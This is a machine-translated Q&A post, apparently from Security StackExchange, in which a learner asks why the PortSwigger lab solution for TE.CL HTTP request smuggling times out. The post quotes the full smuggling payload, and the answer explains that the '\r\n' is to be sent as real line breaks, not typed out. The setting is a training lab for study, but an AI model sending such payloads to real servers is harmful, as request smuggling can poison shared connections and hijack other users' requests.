我试图了解有关http请求走私,我尝试实验室的打嗝套件。I卡在TE.CL漏洞上,我点击了解决方案(参见下面的:https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl),但请求只是超时。我禁用了“更新内容长度”,并用当前的实验室id更改了mylabid。还有我错过的另一个场景吗?
POST / HTTP/1.1
Host: mylabid.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0\r\n\r\n发布于 2019-10-11 04:45:29
“r\n”字。它就像图像,它是解释的,而不是书面的

https://security.stackexchange.com/questions/219115
复制相似问题